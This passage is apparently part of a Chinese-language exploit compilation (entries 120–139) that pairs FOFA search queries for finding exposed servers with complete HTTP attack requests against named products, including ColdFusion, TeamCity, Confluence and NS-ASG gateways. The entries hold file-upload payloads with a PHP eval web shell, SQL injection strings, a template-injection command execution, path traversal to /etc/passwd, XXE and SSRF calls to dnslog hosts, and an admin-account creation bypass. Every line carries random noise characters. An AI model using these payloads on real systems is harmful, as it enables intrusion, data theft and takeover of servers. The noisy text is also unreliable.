Connection: close" F- n) L% l( H, a4 U9 k: A, m
2 e% H3 ?& K+ H, Y; A3 O* rsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
. x( r: o8 Z; d$ k) X1 A1 T7 g# [% V6 S: n. R: G
* Z6 Q, Z- H% N; D4 Q- T# J9 w- l5 p
120. 北京百绰智能S40管理平台导入web.php任意文件上传
* u: _5 F9 M6 z: P2 F. aCVE-2024-1253
2 t9 U$ L2 \) n) M6 q5 LFOFA:title="Smart管理平台"
`/ Q' z6 j3 B$ \POST /useratte/web.php? HTTP/1.1
; B' f4 M7 x. i j' U: S/ gHost: ip:port
5 P/ e8 Y3 t9 b' a, B8 |( `, k NCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db( O$ k" J) R: L0 _/ F
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko- v2 k0 u+ X+ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 c8 t' q, {$ ?2 {) R1 t& I# FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ A2 @! O) Q9 I1 d( s& {& |
Accept-Encoding: gzip, deflate
/ ` X/ A0 {3 ~) V: [" E% w0 fContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 R' x V" m$ u$ z1 e/ ?# m- {
Content-Length: 597: \2 U( E$ u* q/ ^, z- D
Origin: https://ip:port
0 y0 c& N7 }( U5 ~Referer: https://ip:port/sysmanage/licence.php
D" X* `6 M8 @# jUpgrade-Insecure-Requests: 1
* H+ v/ n! X. t, A0 V& M8 ZSec-Fetch-Dest: document4 @+ {! V% Q) p9 B
Sec-Fetch-Mode: navigate4 Y! M9 x# `# S R& w
Sec-Fetch-Site: same-origin
" I* b6 M7 d- y; {5 d+ x/ aSec-Fetch-User: ?19 u: O" }( f7 M7 _- q
Te: trailers# l! f( Q( Y# O% m6 |" x4 [
Connection: close
( }# I: ^; ^; g2 ?" z+ G# H6 U7 W9 H/ b% c; n
-----------------------------42328904123665875270630079328
/ k# L) s! N# x6 E$ v% {Content-Disposition: form-data; name="file_upload"; filename="2.php"% p% ~0 s/ L& G- M6 j7 v
Content-Type: application/octet-stream! n0 O/ w* S4 m% V0 ?1 D
2 q" A& g9 \* ` U8 f; g( v C, u<?php phpinfo()?>
9 I8 M8 q* b( l+ A/ J7 J+ Y-----------------------------42328904123665875270630079328
* m+ o1 l; L0 X$ x6 zContent-Disposition: form-data; name="id_type"+ ?5 I# W. m* x) J" M( K z+ W
3 d) Z) v: k; o$ M9 E, F1. }. x5 x9 \: G( ^
-----------------------------42328904123665875270630079328
8 T6 U: A0 F& {: N9 W4 iContent-Disposition: form-data; name="1_ck"
# O4 i5 [) ~9 N2 ?, w e9 B- B6 U3 F
1_radhttp
( W$ y% Z6 @0 C8 L-----------------------------423289041236658752706300793288 Z, F* I. M5 u g. M
Content-Disposition: form-data; name="mode"
/ m8 n/ d1 B2 y2 z# V# ]' ~/ z
2 W' w; l* i$ I2 j6 f6 g; h+ mimport1 ?, B( n/ j4 D& E$ |& |; I
-----------------------------42328904123665875270630079328. y- p& q2 O7 G
1 f% n' x# {; x8 C4 ?) E8 _
" x$ l) G, @ g/ o4 X( J8 l
文件路径/upload/2.php [4 p$ Z" l& q+ c" Q# U
5 `3 G) g4 h& I# X( f! w8 j
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
$ x- N6 S9 m1 Q/ L3 @- MCVE-2024-1918
+ Q+ N2 f b: Q1 C8 R, h+ rFOFA:title="Smart管理平台"5 Z1 j& f$ t7 k% g
POST /useratte/userattestation.php HTTP/1.1) z* Z7 r! x# n3 S# c& a2 [
Host: 192.168.40.130:8443# t' I4 S9 }: ?5 D+ }
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50; }. f% X$ y1 ^9 ~$ x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko; e5 R7 p+ H, b3 z! U W1 x! ~, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( R8 o4 G& h& I4 L1 M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. `5 s! X1 I; m# `% ` t5 ^
Accept-Encoding: gzip, deflate
5 ?# B9 `7 V4 M( O! |Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+ l' q& k, P3 M' v: Z/ @8 uContent-Length: 592
) b" `: ?4 j, K! z aOrigin: https://192.168.40.130:8443
4 \% G- f( _7 W0 xUpgrade-Insecure-Requests: 1
8 e# v4 R* `9 U6 z% ?# }9 wSec-Fetch-Dest: document
$ T2 \. n! U+ q8 m+ E- u M% [Sec-Fetch-Mode: navigate
' w- V$ t- @" R$ h$ _ U6 D% qSec-Fetch-Site: same-origin
. Y: b2 w; y4 F) w# @4 \/ r& e; QSec-Fetch-User: ?1
' J; d0 @- s$ |* g: s0 N& h% RTe: trailers
/ z( I! T) }; V( a7 dConnection: close
: ?5 z. i* e& I8 ]/ _" m7 I
( b9 ]( z) f9 r6 s- u; b4 Q-----------------------------423289041236658752706300793283 s2 y) M8 f; o; O4 L5 q) w' ]: m' b; H
Content-Disposition: form-data; name="web_img"; filename="1.php"+ Q3 O5 i' [0 \8 C$ ~( \
Content-Type: application/octet-stream; ]$ i# [ Z1 B2 p- j4 l
; i; B# D5 v: g% J. R4 q<?php phpinfo();?>
t, Y0 V5 J9 p- j-----------------------------42328904123665875270630079328: G3 n5 j/ |* u; F' S+ J
Content-Disposition: form-data; name="id_type"
1 P5 ^3 N9 H' I. J! K4 u- f* v8 U1 P! t* N
1
2 B* M g- a+ k. y-----------------------------42328904123665875270630079328
$ c, B) W1 A) W: y' Q) M; }/ o: gContent-Disposition: form-data; name="1_ck"
+ t/ ~$ y6 E( C8 ]# `& y# `6 x8 b/ Q8 O+ f8 D
1_radhttp$ Z- `- r2 q# G" s
-----------------------------42328904123665875270630079328) B4 q/ }% _" z/ H- O3 H
Content-Disposition: form-data; name="hidwel"9 n$ D) I4 V, h0 @$ B. P- k
' A f/ ~- r* Q+ q, l3 uset
5 L# }. p4 Y* d) G$ b+ d' Y# y-----------------------------423289041236658752706300793285 Y: a+ }7 r9 |+ f# y8 E+ D
1 I& \5 S B$ l, w
; b2 t. F) w. L0 yboot/web/upload/weblogo/1.php# d& m: x: V% X" @
" }! I: v* G: y# v i5 J
122. 北京百绰智能s200管理平台/importexport.php sql注入
# @' ]: T# A& c3 ECVE-2024-27718FOFA:title="Smart管理平台"
$ S2 S$ m- S- X3 H其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
! a5 o% F2 ]) E* E' n0 OGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1' R6 \( N# D4 f7 Q6 y# B
Host: x.x.x.x" B9 u# i. e5 K
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0, e3 S4 E- g1 x3 K( G* |# m% `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 d9 O% [ i6 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: a3 l$ g) g' i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 o6 o( T7 B/ P$ CAccept-Encoding: gzip, deflate, br6 g. g- y0 ], _5 c
Upgrade-Insecure-Requests: 1
$ K8 F$ O4 v/ D4 PSec-Fetch-Dest: document- @/ C4 j; K4 E) a9 s) J
Sec-Fetch-Mode: navigate
+ \: U a q$ S2 CSec-Fetch-Site: none$ [+ m/ e+ c) Y
Sec-Fetch-User: ?1: `' l3 S1 m% \. s
Te: trailers. H$ q7 ?( F2 K1 L' q
Connection: close r5 r+ ^$ B: Q% l$ M
6 \( r8 _3 B k
7 ^6 l' e2 N) B* }123. Atlassian Confluence 模板注入代码执行
5 }. c. q& o! z2 ^! FFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
2 @( U4 m" v" Z' w0 d' J! {POST /template/aui/text-inline.vm HTTP/1.1
7 M6 v. m: \+ ~+ OHost: localhost:8090& ^- f# a, y8 \8 j9 T
Accept-Encoding: gzip, deflate, br* ~; ]! o, ~" B$ J7 n
Accept: */*/ j* q: d" i) ]# M. ?
Accept-Language: en-US;q=0.9,en;q=0.8
: y( b6 E9 r1 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36* B% J x, O4 P$ n- B0 \0 y3 [
Connection: close
5 U0 W# G8 K4 v- I' m P1 sContent-Type: application/x-www-form-urlencoded
( L! u2 }1 I/ f" j1 J" n5 h3 X( H2 \' g
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))4 B4 \9 Z! `+ }, E8 a) y- s4 y
0 [! O, ~3 H- y
; O4 \% Q: \( u/ n124. 湖南建研工程质量检测系统任意文件上传$ r! k5 u V5 d$ k9 P
FOFA:body="/Content/Theme/Standard/webSite/login.css"5 v5 A3 H! [9 d( `6 u9 I3 Z
POST /Scripts/admintool?type=updatefile HTTP/1.18 O$ O# B5 f1 d
Host: 192.168.40.130:8282
i6 X. }2 J0 t$ L9 _2 s! }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; s4 o4 w, E; p" ]: BContent-Length: 72
! k0 r0 l& S5 K) g) [9 h6 s/ a# ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
4 g* p( r$ E! h& j5 E* GAccept-Encoding: gzip, deflate, br
/ `) b- p5 Y8 K& w' o2 }" a: i4 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ y3 e5 N- I; t- n" A J
Connection: close' M# a( ^: j, B6 I$ r
Content-Type: application/x-www-form-urlencoded
& V4 \7 Q' d5 K7 ^6 C( v% J* x9 T( i: E5 U: ^8 K
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
' N, z6 O% s& E' C! s, B8 Y' U
/ Z2 T6 `2 ^' I2 g, L B5 K7 J3 A6 Q& i4 A" G" w6 l
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) j. a' V; g( h% b% q; D. n/ E1 J( ~7 i! ^( [3 ?
125. ConnectWise ScreenConnect身份验证绕过
' j0 O! m+ y5 N$ Z3 {CVE-2024-17098 m6 t& \1 b7 E I$ ^( l/ F
FOFA:icon_hash="-82958153"
. K3 s3 c6 U1 {https://github.com/watchtowrlabs ... bypass-add-user-poc. \9 t! G- k% ?/ S" D# g
4 _) E# z$ T3 r
# [( O- J5 h6 O% `
使用方法1 L( f9 p+ g( H7 f' v* ~
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!4 r! {) n3 \* T0 s, j
6 M0 Q+ V" {5 h! v- P$ L) Z
8 G) m3 @. S* O创建好用户后直接登录后台,可以执行系统命令。7 z5 p5 s E" ~% }7 e
( O2 J1 r' b! Z P$ y4 }7 A8 D N
126. Aiohttp 路径遍历, ]4 b1 l) I3 ]% s! I
FOFA:title=="ComfyUI"
% l" R5 e' d) kGET /static/../../../../../etc/passwd HTTP/1.1
! L' [2 h- i ZHost: x.x.x.x9 x7 @0 K; K4 k3 J; ~$ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! H% z5 g" S) g# G( H0 e2 c- S2 U( GConnection: close
7 n5 i, a; { d! p4 D; }! NAccept: */*
) Y2 S: s! j* w4 YAccept-Language: en
2 X; Y* u+ v3 t0 ?; Z0 G& Q9 {Accept-Encoding: gzip
; u- |' A7 Z! Z: ]. ?+ u: b: w, Y4 o$ ~# A8 Y- A& `; j. ?
( g+ X. k# `4 v! [1 _127. 广联达Linkworks DataExchange.ashx XXE& v' R) J- p ~$ o, u4 _4 q
FOFA:body="Services/Identification/login.ashx"
% @0 `. h% {2 RPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.11 I8 r3 }; Q2 x) d Z+ U
Host: 192.168.40.130:8888
0 m7 C+ M4 @: H, E5 y' BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
7 a7 w! Y" m0 }( gContent-Length: 415; ?) E. _5 N8 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, Q5 I" p% x8 A* O4 _/ x% z! ^
Accept-Encoding: gzip, deflate
9 R, l0 b( f( P6 i P% UAccept-Language: zh-CN,zh;q=0.90 ?& x, ^( b% C$ X4 Z5 f% {4 u; p! R+ ]
Connection: close
1 R2 k+ }) a8 Q4 N a* uContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0$ Y( t8 i" T i$ x, g
Purpose: prefetch9 ?! ?5 k4 \0 _. A! a
Sec-Purpose: prefetch;prerender* T- ^( {( _* y9 r. V- `
$ I5 `+ S0 D$ F! `) n------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 t6 q, m; Q5 AContent-Disposition: form-data;name="SystemName"
# P! y: f" f* r) { t$ {7 V. h0 L5 L$ G+ m: b9 X
BIM
! ~+ k) e4 C* _3 z------WebKitFormBoundaryJGgV5l5ta05yAIe0" t" V' }9 [) |6 d& R6 V
Content-Disposition: form-data;name="Params"
0 O G2 B8 v! q7 |2 YContent-Type: text/plain4 Z8 M% L+ F5 B2 _6 n* T, E7 _
* y t, Y4 i- U
<?xml version="1.0" encoding="UTF-8"?>
( u7 I' ~; v$ M( a! |<!DOCTYPE test [
+ T" E/ ~0 H9 I$ y" ?! U3 y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">+ f- w. ]( s" l
]
# U' _8 F) t+ W ]>+ r9 O% X, K* n! k
<test>&t;</test>
# ?/ J+ @# R3 T1 k6 U2 h4 V( c3 X! b------WebKitFormBoundaryJGgV5l5ta05yAIe0--
) ?1 z- ^* |+ i- s" T4 v: C9 X1 U8 r2 [' t& U0 U- Q
" d; Y: u, x+ o- f8 O0 a, F3 f7 E# [, S5 U) U
128. Adobe ColdFusion 反序列化
8 y0 n" f) g3 `0 ^# }CVE-2023-38203: M; a- u+ y! J \8 G+ z- X
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)8 O3 a( R# z, k( N: F$ U
FOFA:app="Adobe-ColdFusion"
. W; }8 B; m0 O: T" ^PAYLOAD, Q1 \1 F6 ~ G- _/ O& @5 E% }( f
, p' q7 C# v- _6 t1 w- F) H
129. Adobe ColdFusion 任意文件读取 Y" m* S) s' j# b) u2 L
CVE-2024-20767
& r u2 p! p& O! V7 o- L% _0 a. cFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"6 d9 z. o6 `5 D: U) C
第一步,获取uuid: ?# S1 E5 `3 R4 `+ G
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% k0 l$ q# s8 R/ ?
Host: x.x.x.x" \3 K, U( D# ?* ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 [* U; e8 [0 n/ j5 {( dAccept: */*, C; P3 ]' h9 U0 R% h7 _; A& o3 T
Accept-Encoding: gzip, deflate
' q/ j, e- }( [0 A: c/ C# IConnection: close
: e3 e# G1 N' F1 J8 Y1 C$ H) J1 t3 V6 l. A1 P0 H
( u% w1 K' O( O$ c9 }
第二步,读取/etc/passwd文件! M( `! K0 A/ b. A7 \
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1' E* I, A. ^, I$ f
Host: x.x.x.x2 h1 G) H# ~, P+ E1 O6 X5 K6 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ a( ?9 m5 H }: m
Accept: */*
# \4 a8 d3 J% y- l s3 vAccept-Encoding: gzip, deflate* z. ^/ [* P- _* U; `0 |. _! d4 L
Connection: close8 C" W3 e! b1 @/ g
uuid: 85f60018-a654-4410-a783-f81cbd5000b93 b- W" T, |* o, \. e! X1 k" b
/ p/ t0 _+ I1 w
7 Q+ E- p) t5 H5 O& @130. Laykefu客服系统任意文件上传* i, [7 a' q, T9 K$ T/ C7 q7 E; {
FOFA:icon_hash="-334624619"
1 ]' K& e) c, f& X/ P! |POST /admin/users/upavatar.html HTTP/1.18 Z" a% c% H' s+ x
Host: 127.0.0.1
d1 I; S0 {* Z% R0 l1 C5 BAccept: application/json, text/javascript, */*; q=0.01- G, N) X7 Q+ y0 `! y
X-Requested-With: XMLHttpRequest
5 C5 ^, G5 c$ j6 G! i! z. P& V9 W! CUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
2 m8 j- `! r4 c; d$ }7 J4 ~" PContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR' {8 U$ L% N% U/ v. u
Accept-Encoding: gzip, deflate/ Q% h! s9 c3 N! @
Accept-Language: zh-CN,zh;q=0.9. Y9 `; U, k/ i7 c1 A
Cookie: user_name=1; user_id=36 ?. n y; S1 L4 k) l
Connection: close# l3 `8 S& B+ t5 Y
: J( y" A9 @ T- n8 M" {/ U
------WebKitFormBoundary3OCVBiwBVsNuB2kR
" M( U: ^! X; g$ h" W% g3 V CContent-Disposition: form-data; name="file"; filename="1.php"' }6 v, M9 ]8 u. I; |
Content-Type: image/png
; l! E/ W! A% r! `* R% O
1 ]. k/ ]" u: e3 d! P<?php phpinfo();@eval($_POST['sec']);?>' w7 T. p7 A: u) Y
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
: |- b. ^) f# q* Y: m1 Z. S) Q0 }3 [4 F
; H' @6 `4 g- q- n131. Mini-Tmall <=20231017 SQL注入
/ N+ _( r( B/ r$ e$ Z QFOFA:icon_hash="-2087517259"
7 j5 t- ], V. N5 p' Z后台地址:http://localhost:8080/tmall/admin& N; v1 V4 r; `" k
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)5 g3 s* W# p9 R# s. |8 v
$ O! G( j* U4 L% H/ H132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 r) t& Q5 M, J0 D# P$ g8 u
CVE-2024-27198
: f- N! y. t+ _8 X! lFOFA:body="Log in to TeamCity"# M, g0 L6 z$ g( p
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1: @1 E6 x3 J7 O% s$ _
Host: 192.168.40.130:8111( A: V; R0 i; P& l7 j% x P% C/ |* ^- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( \' G" I7 J& R. i) UAccept: */*
9 `: [2 s% Y ^& x6 |& W) KContent-Type: application/json
; P f$ i/ E0 D* {3 LAccept-Encoding: gzip, deflate
( C! \$ g& D' S$ f2 x0 c) b; Z' Q
" L+ T1 O- f2 B. A. h$ n. A{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}+ Q6 p$ e; J* b4 b+ x! E
& \& ^2 ?0 M9 l' S
$ G" u$ j7 T4 l$ } |/ n! F4 cCVE-2024-271996 G k, |" m+ K, g2 u
/res/../admin/diagnostic.jsp
3 {5 v1 h' @. v/.well-known/acme-challenge/../../admin/diagnostic.jsp7 t! e" A- G$ B& o2 R
/update/../admin/diagnostic.jsp5 E0 n. w7 \" A, y
2 r& W" |5 x/ E! y6 O" C# }) i
! t3 y+ j% F, d) w
CVE-2024-27198-RCE.py
! P7 g3 y4 Z! h0 w) c' ]8 Y$ ]6 y0 C6 l
133. H5 云商城 file.php 文件上传/ f0 u+ M' W0 @" Y4 I' p& D
FOFA:body="/public/qbsp.php"
$ P/ P4 _4 X; j; y& H) U5 t3 hPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1. l- E6 @* Y `) b/ |% k
Host: your-ip) a2 [% d6 G2 E: s1 S) _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 H6 T) r# `6 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
% J' p2 n4 C, y u& I& l8 m
3 M& w6 p) f/ U------WebKitFormBoundaryFQqYtrIWb8iBxUCx. j. ]; N. _9 q
Content-Disposition: form-data; name="file"; filename="rce.php"
% `1 Z2 k+ \* h0 V2 n) {Content-Type: application/octet-stream$ \/ V0 h) d1 t" i& W, H+ w/ U
/ l& `0 P* m. \
<?php system("cat /etc/passwd");unlink(__FILE__);?>" ?& m; O/ i6 Q I( |
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--8 Y" M; ]) H( t+ ~$ h! p) V4 m& n
, ~; m8 o' X; H8 R$ Q( Q
, A8 b4 [: L( m; x0 C4 i n1 N4 r; r7 `5 W
134. 网康NS-ASG应用安全网关index.php sql注入
5 T* f3 } F7 @3 J& |0 O8 ~CVE-2024-2330
% A A5 E& T% U7 Z4 o QNetentsec NS-ASG Application Security Gateway 6.3版本: Z. g. w! s' d3 J" I* @
FOFA:app="网康科技-NS-ASG安全网关"# z" B' A* p7 |3 X \4 \ n/ _
POST /protocol/index.php HTTP/1.16 P0 m0 V) p5 R+ _
Host: x.x.x.x
/ j5 c/ G; |) N' j7 Y" xCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de5 ]! i7 {) ?. |8 E% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0: \; D# f7 \( j& F3 W" m9 Q
Accept: */*7 P& W6 v; F& M. q4 ?* Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 X8 q$ T6 ]0 l5 Y
Accept-Encoding: gzip, deflate' N0 E) Y" w9 ~5 O5 K
Sec-Fetch-Dest: empty
8 Q1 L9 P! S% P# p" Q* Z# ]Sec-Fetch-Mode: cors
+ l$ ?2 A7 M7 ?) C/ l. tSec-Fetch-Site: same-origin
% q0 E' s# F4 X$ k, ~Te: trailers/ Y8 e8 ~( j* z/ d0 k9 h
Connection: close; q! Q3 t8 W6 t- X; w& U% Q5 l
Content-Type: application/x-www-form-urlencoded
- Z0 ?, @7 X5 B5 Z2 WContent-Length: 263
6 B# o% K! N2 m. j
1 g& k$ B2 s, T, z! t* P5 _4 ]# pjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}! h+ z* a- b3 N0 w
6 o: B {, N- z
& Q$ o6 m* f1 q+ r7 D
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* b0 U7 v3 r+ ?7 E' c
CVE-2024-2022
% y1 m6 { \7 KNetentsec NS-ASG Application Security Gateway 6.3版本
. _& s/ @7 x# p- N5 lFOFA:app="网康科技-NS-ASG安全网关"
7 F/ ~: P* H7 D0 O5 ^$ @GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ l* Q' E- ^: ~" z) x9 B
Host: x.x.x.x
3 K* o. e& |) bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% f% k9 }( z* I, t( | A% B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 h0 y3 {; {6 M2 i( H1 C kAccept-Encoding: gzip, deflate
) r4 g$ x& n" v: kAccept-Language: zh-CN,zh;q=0.9( t- R4 c) h1 L4 G1 |) c$ E" B6 W
Connection: close8 ^. ~/ E! t9 N- V% `' r& s
1 x; a( K: o" C+ F- T! h
3 @8 V. U7 y" I& |136. NextChat cors SSRF
# T1 A. B# g; b& UCVE-2023-49785
, Y Q& V& G, h5 nFOFA:title="NextChat"4 y" z* @- }7 T7 Q
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.18 r3 W$ j) ]+ E' Q" M6 [- V+ i- b+ x1 O
Host: x.x.x.x:10000
& J. g6 ~' h, y w! O2 d, eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ E( u, e) v, M/ M. h* U! }" O
Connection: close y+ I. ^* ^9 r# K
Accept: */*
! ^* L$ h5 q1 zAccept-Language: en4 j+ n8 m# v+ z, G4 ^, ~4 R# ^/ H
Accept-Encoding: gzip
5 u: g* c0 ?' L; \6 p6 f. X% r3 \0 E; J. w
6 S/ r# Q. i4 C# Q/ e137. 福建科立迅通信指挥调度平台down_file.php sql注入# d G" z6 }- `
CVE-2024-2620
9 }) N. l) n- q" U: Y" ?- uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! O6 M- C5 M, b' N% uGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1 \ b( n4 l, F; m
Host: x.x.x.x
0 G. F5 s3 N0 P" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" K( S1 I4 `- m$ A6 q1 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ o1 L1 ~" R# l+ L6 J3 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ n; S& v5 O2 }' C0 f4 PAccept-Encoding: gzip, deflate, br8 Z- q) M5 X4 N3 L3 r0 d
Connection: close1 }( s' v9 o0 V# E4 W
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) |; b" S4 R7 U2 zUpgrade-Insecure-Requests: 15 i. s6 e7 U B& L! a8 E
$ z* l: {2 R& u7 \; X9 A3 i7 ?
9 @3 ]# L( W" |9 h. s, E3 X; A
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( W7 J; `2 p1 y* t& f4 H3 P
CVE-2024-2621: Y4 |) W7 O) a& l- b- |2 ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* V# j) ]+ Z9 b; v$ f' b
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
5 E) _% x! b' u6 [Host: x.x.x.x
0 g; z! Q, H( h& Z* k3 E& l- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 l' T& Y* i- Z% u5 F; }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) k5 g, |: T g- t4 V/ t W+ a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ T% H3 t7 N$ s, LAccept-Encoding: gzip, deflate, br( s. H+ W" g( S6 W: T/ H
Connection: close/ E/ U: t; Z* J, m
Upgrade-Insecure-Requests: 1) J) }( l1 ^1 b _! V
# I- q2 V9 w: C! \* w
$ }7 {8 o( C0 j2 l( h) E139. 福建科立讯通信指挥调度平台editemedia.php sql注入: F- B1 F' O7 c% {, Y
CVE-2024-26222 n ]& z/ o3 d$ J6 l- f
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& Y1 ^* f& v7 p+ m. j" O$ N
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1% F, ~1 k2 K$ L* _$ o6 E4 C
Host: x.x.x.x1 d1 P x* i. |' o: K ]
